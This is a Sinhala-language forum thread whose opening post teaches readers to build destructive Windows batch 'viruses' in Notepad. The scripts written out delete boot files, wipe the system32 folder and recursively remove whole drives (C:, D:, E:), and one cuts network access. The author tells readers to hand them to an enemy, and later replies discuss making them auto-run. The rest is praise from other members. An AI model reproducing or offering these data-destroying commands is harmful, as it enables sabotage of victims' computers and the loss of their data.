1. සමාවන්න. වෙබ් අඩවි‍යේ ඇති ලිපි බැලීමට හැකියාව ඇත්තේ සාමාජිකයන්ට පමණි. එබැවින් මෙතන ක්ලික් කර සාමාජිකත්වය ලබාගන්න. ගිණුමක් සාදන ආකාරය දැන ගැනීමට මෙතන ක්ලික් කරන්න.
  2. තම ෆේස්බුක් ගිණුම හරහා ෆෝරමයේ ලියාපදිංචිය සිදු කර ගත් අය හට ෆෝරමයට ලොග් විය නොහැකි බව ආරංචි විය. ඔබටත් එසේ සිදූ වී ඇත්නම් ඇත්නම් Forget password යන්න භාවිතා කර අලුත් password එකක් සාදාගෙන ලොග් වන්න. ගැටලුවක් පවතී නම් rulemax567@gmail.com වෙත email එකක් එවන්න.
    Dismiss Notice
Dismiss Notice
ආයුබෝවන් Guest ඔබ කැමතිද අපගේ Security Services එක සමග එකතු වී වැඩ කරන්න එසේනම් මෙතනින් එන්න

TUTORIAL නෝට්පෑඩ්එක පාවිච්චි කරල පොඩි Virus ටිකක් හදමු.....

Discussion in 'Java Programming, Batch coding' started by Alex, Jun 9, 2017.

  1. Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    ඔන්න මචංලා ශ්‍රී මාෆියා එකට එකතු වෙලා ටික කාලයක් උනාට මේ තමා පලවෙනි පෝස්ට් එක;);).ගොඩක් දේවල්
    ඉගෙනගත්ත මේකෙන් දිගටම කරගෙන යමල්ල අපි ඉන්නව උබල එක්ක.වැඩි කතා ඕන්නෑ පෝස්ට් එකේ
    Title පේනවනෙ මාත් දෙන්න හදන්නෙ පුංචි පහේ වයිරස් ටිකක් අපිටම හදාගන්න පුලුවන් Notepad එකෙන්.
    පුංචි පහේ කිව්වට ටිකක් භයානකයි ඒ හන්ද උබලෑ PC වලනම් Open කරන්නෙපා දීල බලහන් ඉන්න
    තරහකාරයෙක්ට:D:D

    01.මේක Run උන ගමන් PC එක off වෙනව ඒ එක්කම reboot,restart වෙන්න ඕන කරන ෆයිල්
    delete කරල දානව.ඒ කියන්නෙ ඉතින් සදාසොත්ති:p

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    02.මේකෙන් කරන්නෙ System 32 Folder එක delete කරල දාන එක.මොකද වෙන්නෙ කියල අමුතුවෙන් කියන්න ඕනෙනෑනෙ ;)

    del c:\WINDOWS\system32\*.*/q

    03.හරි සරල වැඩක් වෙන්නෙ.තත්පර 3 කින් වගේ Drive ඔක්කොම Format වෙනව:p:p

    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\

    04.මේකනම් පොඩිම එකක්. Internet Access stop කරන එක තමා කරන්නෙ.

    Ipconfig /release

    මේක ආපහු fix කරන්නනම් IPconfig /renew කියල ටයිප් කරන්න.

    •උබලට ඕන කෝඩ්එක නෝට් පෑඩ් එකට පේස්ට් කරල File → Save As ගිහිල්ල සේව් කරන්න.
    •මේ ඔක්කොගෙම file name එක දෙන්නෙ .bat විදිහට හොදේ.උබලට ඕන නමක් දීල .bat දියල්ල.
    උදා:- any.bat වගේ.

    එහෙනම් අපි ගියා මචංලා මේව දන්න උනුත් ඇති නොදන්න උනුත් ඉන්න හන්දයි දැම්මෙ.අඩුපාඩු එහෙම තියෙයිනම් පොඩ්ඩක් කියහල්ල කමන්ට් එකකින් :rolleyes:එතකොට ඊලග පෝස්ට් එක හොදට දාන්න පුලුවන්නෙ බන්.ඊලග පෝස්ට් එක එනකල් බායි කිව්ව ඔක්කොටම :):)
    #AS
     
    #1
    Last edited: Jun 9, 2017
    charitha, Sanka gee, Shn frye and 4 others like this.
  2. Shadow

    Shadow Administrator
    Staff Member Gold Member

    Messages:
    475
    Likes Received:
    351
    Post eka ela aa... digatama liyamu... good luck !
     
    #2
    Alex likes this.
  3. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    තෑන්ක්ස් මචෝ ;);)
     
    #3
    Shadow likes this.
  4. Induwara Uthsara

    Induwara Uthsara නැගී එන සාමාජික

    Messages:
    180
    Likes Received:
    88
    ela machan... :D
     
    #4
    Alex likes this.
  5. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    ;););) එලම බන්
     
    #5
    Induwara Uthsara likes this.
  6. Holman ToRa

    Holman ToRa නවක සාමාජික

    Messages:
    17
    Likes Received:
    18
    Niyamai machan views ganata comment weten na.. meka lankawane ban.. thamange wede wenawanam achcharai..
    niyamai bro.. digatama liyamu... onima kenekta dekka gaman therenna liyala thiyenwa..
     
    #6
    Alex likes this.
  7. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    Thanks bro...කමන්නෑ බන් view කරපු උන් කමන්ට් නොදැම්මට දෙයක් ගන්න ඇතිනෙ මොනාහරි.ඒ ඇති.තව පෝස්ට් එකක් දැම්ම මචෝ බලහන් ;);)
     
    #7
    Holman ToRa and Induwara Uthsara like this.
  8. danuka

    danuka නවක සාමාජික

    Messages:
    1
    Likes Received:
    1
    Ela macho
     
    #8
    Alex likes this.
  9. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    ;);););)
     
    #9
    Holman ToRa likes this.
  10. udaya076

    udaya076 සාමාජික

    Messages:
    27
    Likes Received:
    15
    elama
     
    #10
    Alex likes this.
  11. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    :):)
     
    #11
  12. Shadow

    Shadow Administrator
    Staff Member Gold Member

    Messages:
    475
    Likes Received:
    351
    Post eka damma gamn view 1i. E post eka dana kenagema view ekak.... elagata post eka ekkenek kyawanawa... thawa view 1i. Eya reply kranawa... e reply eka balanna post eka liwwa kena enawa.. ethakota thawa view 1i...

    Ohoma yaddi hithana tharam views awilla nathi wenna puluwn....
     
    #12
    Alex likes this.
  13. Kalana

    Kalana නවක සාමාජික

    Messages:
    2
    Likes Received:
    2
    ela :):):)
     
    #13
    Induwara Uthsara and Alex like this.
  14. Shn frye

    Shn frye නවක සාමාජික

    Messages:
    1
    Likes Received:
    2
    Elama.bro
     
    #14
    Alex and Induwara Uthsara like this.
  15. Keshara Nandasena

    Keshara Nandasena සාමාජික

    Messages:
    37
    Likes Received:
    21
    elama bro.......
     
    #15
    Alex and Induwara Uthsara like this.
  16. error4o4

    error4o4 නවක සාමාජික

    Messages:
    1
    Likes Received:
    2
    ftth brtheR
     
    #16
    Induwara Uthsara and Alex like this.
  17. Sahan s liyanage

    Sahan s liyanage නවක සාමාජික

    Messages:
    3
    Likes Received:
    4
    Oya batch file auto run wenna hadanne kohomada?
     
    #17
    Induwara Uthsara and Alex like this.
  18. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    ඒකනම් පොඩ්ඩක් බලහන් ගූගල් කරල.ශෝට්කට් එකක් හදල සීන් එකක් තියෙයි
     
    #18
    Induwara Uthsara likes this.
  19. t®4N$g®€$$0®

    t®4N$g®€$$0® සාමාජික

    Messages:
    47
    Likes Received:
    36
    Niyamai saho idiriyatath mewage dewal liyapan
     
    #19
    Induwara Uthsara and Alex like this.
  20. Thread Starter
    Alex

    Alex නැගී එන සාමාජික

    Messages:
    133
    Likes Received:
    119
    එල එල ;);)
     
    #20
    Induwara Uthsara likes this.

Share This Page